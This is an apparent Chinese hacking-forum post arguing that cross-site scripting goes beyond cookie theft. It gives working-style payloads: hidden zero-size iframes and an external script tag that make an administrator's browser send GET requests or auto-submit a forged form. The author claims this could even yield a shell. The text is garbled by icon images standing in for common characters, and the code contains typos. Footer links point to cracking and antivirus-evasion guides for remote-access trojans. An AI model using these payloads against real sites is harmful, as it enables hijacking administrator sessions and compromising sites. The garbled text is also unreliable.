不知道大家如何认为跨站攻击
![](/icons/35877de.gif)
![](/icons/35877dou.gif)
真
![](/icons/35877de.gif)
是鸡肋
![](/icons/35877de.gif)
问题吗?其实跨站不仅仅是偷COOKIES那么简单!看看GET和POST两种提交(允许外部提交
![](/icons/35877de.gif)
情况)
看看以下
![](/icons/35877de.gif)
代码(GET):
<
![](/icons/35877if.gif)
rame src="http://www.20nt.net/add.asp?pass=bin&pass=bin"
width="0" height="0" frameborder="0">
</
![](/icons/35877if.gif)
rame>
如果长度有限制
![](/icons/35877de.gif)
话可以这写:
<Script url=http://www.20nt.net/bin.js></Script>
js完全可以是外部
![](/icons/35877de.gif)
!
至于POST
![](/icons/35877de.gif)
思路方法我想大家也应该能想到:
<
![](/icons/35877if.gif)
rame src="http://www.20nt.net/bin.htm" width="0" height="0" frameborder="0"></
![](/icons/35877if.gif)
rame>
我们在bin.htm可以做
![](/icons/35877yi.gif)
个表单,在表单
![](/icons/35877de.gif)
尾部加上:
<Scriptlanguage="javascript">this.doctument.form[0].submin
![](/icons/35877kh.gif)
</Script>
当管理员访问到跨站代码
![](/icons/35877de.gif)
时候就会实现表单
![](/icons/35877de.gif)
内容.我想如果可以构造
![](/icons/35877de.gif)
很好
![](/icons/35877de.gif)
话甚至可以直接得到shell!
如果大家想出了更好
![](/icons/35877de.gif)
思路方法可以写出来
![](/icons/35877yi.gif)
起讨论
上
篇文章: 完全破解灰鸽子成为会员
下
篇文章: 修改pcshare
sys文件免杀在线动画教程
Tags:
延伸阅读
最新评论